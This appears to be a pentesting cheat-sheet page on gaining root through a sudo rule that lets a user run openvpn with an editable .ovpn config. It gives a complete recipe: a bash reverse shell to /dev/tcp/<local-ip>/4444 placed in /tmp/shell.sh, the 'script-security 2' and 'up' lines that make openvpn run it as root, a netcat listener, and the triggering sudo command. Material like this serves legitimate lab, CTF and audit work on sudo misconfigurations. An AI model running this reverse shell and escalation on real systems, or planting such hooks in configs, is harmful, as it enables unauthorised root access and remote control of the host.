Sudo OpenVPN Privilege Escalation
Sudo openvpn may be vulnerable to privilege escalation.
(root) /usr/sbin/openvpn /opt/example.ovpn
Copied!
If we can execute openvpn
command as root and we have a permission of editing the .ovpn
file, we can escalate to privilege.
First create a shell script to reverse shell. For example, create /tmp/shell.sh
.
Replace <local-ip>
with your local ip address.
#!/bin/bash
bash -i >& /dev/tcp/<local-ip>/4444 0>&1
Copied!
Then change the file permission so that root can execute this script.
chmod +x /tmp/shell.sh
Copied!
Next edit the .ovpn
file.
We need to add "script-security 2" and "up /tmp/shell.sh
" into the header.
# /opt/example.ovpn
...
script-security 2
up /tmp/shell.sh
<ca>
-----BEGIN CERTIFICATE-----
...
Copied!
In local machine, start a listener.
nc -lvnp 4444
Copied!
Now execute openvpn
command as root.
sudo /usr/sbin/openvpn /opt/example.ovpn
Copied!
This command executes our shell.sh
, so we should get a root shell.
Last updated